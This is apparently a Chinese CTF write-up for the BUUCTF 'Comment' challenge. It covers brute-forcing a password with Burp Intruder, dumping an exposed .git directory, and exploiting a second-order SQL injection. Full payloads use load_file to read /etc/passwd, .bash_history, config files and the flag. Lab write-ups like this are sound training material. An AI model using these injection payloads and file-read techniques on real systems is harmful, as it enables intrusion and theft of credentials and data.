BUUCTF在线评测,在官网找到Comment这道题
1.破解密码
1.1发帖界面
才进来,我们点击发帖,随便输入点什么内容。
提交之后我们进入了登录界面,这里显示了又用户名和密码,只不过密码后三位是不知道的
1.2.使用burpsuite抓包工具,爆破密码
密码后面先随意输入
打开浏览器的代理,和burpsuite的代理,然后刷新浏览器
我们把抓到的包,发送到Intruder模块,在密码后面用$符号包裹一个数值,这个数值就是用来破解的地方
点击上面的payload,设置payload类型为数值型,因为密码后面是三位,我就就从0到1000破解,这些设置好后,就可以开始攻击了
这里也是比较幸运,后面的密码三位的确是数字,然后根据长度的不同,我们已经可以确定666就是后面的那三位数值
2.找漏洞所在
2.1.先在登录后的界面测试
这里使用了各种常规的闭合等,后没有任何效果,但是,一般的类似于这种,有.git文件可以查看,我们试着查看根路径下面的.git文件。
这里显示为Forbidden,可以知道,是有这个文件的。但是我们怎么拿到这个文件呢?
2.2.拿取git文件
这里我使用的是dirsearch先扫描网站
python dirsearch.py -u http://e083d9cf-14e5-4da1-b0fa-fb48407b145a.node5.buuoj.cn:81/这里可以看见,在网站路径下确实存在.git文件,扫描的结果在这可以看见,也可以在dirsearch-master安装路径里去看
既然知道有这么一个文件了,我们就是用githacker把这个文件拿下来,先把dirsearch扫描出来的结果里,把网址路径复制下来
进入GitHacker里面,拉取这个.git文件,关于这里为什么我的拉取路径和扫描的路径不一样,那是因为中途这个靶机断了,只好重来,所以网址有所偏差。
githacker --url http://3102c428-6668-4e83-969e-3c1450eefad4.node5.buuoj.cn:81/.git --output-folder result
2.3复原git文件
可以看见,我们拉取的git文件就是这个write_do.php
可点击查看,很明显可以看出这个代码并不完整。
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){header("Location: ./login.php");die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':break;
case 'comment':break;
default:header("Location: ./index.php");
}
}
else{header("Location: ./index.php");
}
?>
复原git文件,在cmd界面进入到write_do.php的路径来
git log --all
可以看到,head指针指向的是最早一次commit,通过git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c 命令将head指向第一个commit,得到完整的write_do.php
这下代码就完整了
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){header("Location: ./login.php");die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':$category = addslashes($_POST['category']);$title = addslashes($_POST['title']);$content = addslashes($_POST['content']);$sql = "insert into boardset category = '$category',title = '$title',content = '$content'";$result = mysql_query($sql);header("Location: ./index.php");break;
case 'comment':$bo_id = addslashes($_POST['bo_id']);$sql = "select category from board where id='$bo_id'";$result = mysql_query($sql);$num = mysql_num_rows($result);if($num>0){$category = mysql_fetch_array($result)['category'];$content = addslashes($_POST['content']);$sql = "insert into commentset category = '$category',content = '$content',bo_id = '$bo_id'";$result = mysql_query($sql);}header("Location: ./comment.php?id=$bo_id");break;
default:header("Location: ./index.php");
}
}
else{header("Location: ./index.php");
}
?>
3.寻找注入点
可以看见,这里使用addslashes()对我们提交的数据进行了处理。后台对输入的参数通过addslashes()对预定义字符进行转义,加上\,预定义的字符包括单引号,双引号,反斜杠,NULL。但是放到数据库后会把转义符 \ 去掉(进入数据库后是没有反斜杠的),并存入数据库中。
但是在cmment中,对于category的值从数据库取出来没有进行转义,直接拼接到sql insert语句中,这就存在二次注入的可能。
我们就可以根据下面这个查询语句构建我们的payload,
我们在category里面写入我们的语句,然后提交
查看提交结果详情。
在留言,也就是content参数,输入*/#,闭合前面的本来的content,#用来注释后面的引号
insert into commentset category = '0',content=database(),/*',content = '*/#',bo_id = '$bo_id'
这下我们就找到了二次注入的点了,下面我们就开始注出我们想要的数据了
4.读取文件
使用select load_file(‘文件绝对路径’)来读取文件,这里的路径,我们可以猜想一下,大部分的服务器都是linux系统的,所以我们先以linux系统的文件访问示范一下。
读/etc/init.d下的东西,这里有配置文件路径
?id=1' union select 1,2,load_file('/etc/init.d/httpd')
得到web安装路径
?id=1' union select 1,2,load_file('/etc/apache/conf/httpd.conf')
读取密码文件
?id=1' union select 1,2,load_file('var/www/html/xxx.com/php/conn.inc.php')
4.1读取/etc/passwd文件
a',content=(select (load_file('/etc/passwd'))),/*
4.2查看www用户的历史执行命令
读取成功,可以知道www用户(一般和网站操作相关的用户,由中间件创建)的目录是/home/www,可以查询这下面的.bash_history
a',content=(select (load_file('/home/www/.bash_history'))),/*
这里可以看见,www用户进入到tmp目录下,解压了一个html的压缩文件,然后删除了压缩包,将解压了的文件拷贝到了/var/www/html目录下,然后删除了.DS_Store,值得注意的是,他并没有删除/tmp目录下解压出来的.DS_Store文件,所以我们就可以查看
.DS_Store(英文全称 Desktop Services Store)是一种由苹果公司的Mac OS X操作系统所创造的隐藏文件,目的在于存贮目录的自定义属性,例如文件们的图标位置或者是背景色的选择。通过.DS_Store可以知道这个目录里面所有文件的清单。
a', content=(select (load_file('/tmp/html/.DS_Store'))),/*
4.3查看文件清单.DS_Store
这儿由于文件太大,不能完全显示,所以我们用十六进制编码,然后找个网站解码就行了。改为payload:
a', content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
我们复制这个,然后解码
看到解码的内容有些乱,我们将解码后的复制到txt文档更容易看清晰,可以看见含有flag的php文件了,这就是我们的目标
4.4读取flag文件
a',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*
解码得到我们需要的flag
5.提交
